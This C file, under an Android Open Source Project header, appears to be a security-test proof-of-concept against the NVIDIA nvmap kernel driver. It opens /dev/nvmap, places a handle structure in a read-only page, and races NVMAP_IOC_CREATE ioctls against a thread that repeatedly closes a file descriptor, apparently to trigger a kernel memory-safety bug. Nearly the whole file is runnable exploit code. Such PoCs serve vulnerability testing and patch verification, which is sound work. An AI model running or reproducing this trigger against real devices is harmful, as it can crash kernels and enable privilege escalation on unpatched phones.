/*
 * Copyright (C) 2017 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
#define _GNU_SOURCE
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <string.h>
#include <dlfcn.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <pthread.h>  
#include <unistd.h> 
#include <sched.h>

#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
#define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)

#define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)

/* allocation flags */
#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)

#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)

struct nvmap_handle_param {
	__u32 handle;		/* nvmap handle */
	__u32 param;		/* size/align/base/heap etc. */
	unsigned long result;	/* returns requested info*/
};

struct nvmap_create_handle {
	union {
		__u32 id;	/* FromId */
		__u32 size;	/* CreateHandle */
		__s32 fd;	/* DmaBufFd or FromFd */
	};
	__u32 handle;		/* returns nvmap handle */
};

struct nvmap_alloc_handle {
	__u32 handle;		/* nvmap handle */
	__u32 heap_mask;	/* heaps to allocate from */
	__u32 flags;		/* wb/wc/uc/iwb etc. */
	__u32 align;		/* min alignment necessary */
};

#define NVMAP_IOC_MAGIC 'N'
#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
#define NVMAP_IOC_GET_ID  _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
#define NVMAP_IOC_GET_FD  _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
#define NVMAP_IOC_FREE       _IO(NVMAP_IOC_MAGIC, 4)
#define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)
int g_fd = -1;
static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
struct nvmap_create_handle* g_allocation = NULL;
struct nvmap_create_handle g_allocation_dup;

int open_driver() {
    char* dev_path = "/dev/nvmap";
    g_fd = open(dev_path, O_RDWR);
    if (g_fd < 0) {
        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
    } else {
        printf("[*] open file(%s) succ!\n", dev_path);
    }
    return g_fd;
}

void trigger_nvmap_create() {
    ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
}

void trigger_nvmap_create_dup(int fd) {
    g_allocation_dup.fd = fd;
    ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
}

void trigger_nvmap_alloc() {
    struct nvmap_alloc_handle alloc = {0};
    alloc.align = 0x1000;
    alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
    alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
    alloc.handle = g_allocation->handle;
    ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
}

void trigger_nvmap_free(int fd) {
    ioctl(g_fd, NVMAP_IOC_FREE, fd);
}

void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
    setpriority(PRIO_PROCESS, gettid(), privi);

    /* bind process to a CPU*/
    if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
    }
}

void prepare_data() {
    void* data = (void *) memalign(0x1000, 4 * 0x1000);
    //void* data = malloc(0x10000);
    printf("[*] data = %p\n", data);
    g_allocation = (struct nvmap_create_handle*)data;
    g_allocation->size = 1024;
    g_allocation->handle = -1;
    mprotect(data, 0x1000, PROT_READ);
    printf("[*] mprotect, error = %d\n", errno);
}

void* race_thread(void* arg) {
    setup_privi_and_affinity(-10, 2);
    
    pthread_mutex_lock(&mutex);
    pthread_cond_wait(&cond, &mutex);
    pthread_mutex_unlock(&mutex);
    
    while (1)
        close(1024);
}

int main(int argc, char**argv) {
    
    setup_privi_and_affinity(-10, 1);
    
    if (open_driver() < 0) {
        return -1;
    }
    prepare_data();
    
    pthread_t tid;
    pthread_create(&tid, NULL, race_thread, NULL);
    usleep(100 * 1000);
    
    pthread_cond_signal(&cond);
    usleep(20);
    while (1) {
        trigger_nvmap_create();
    }
    return 0;
}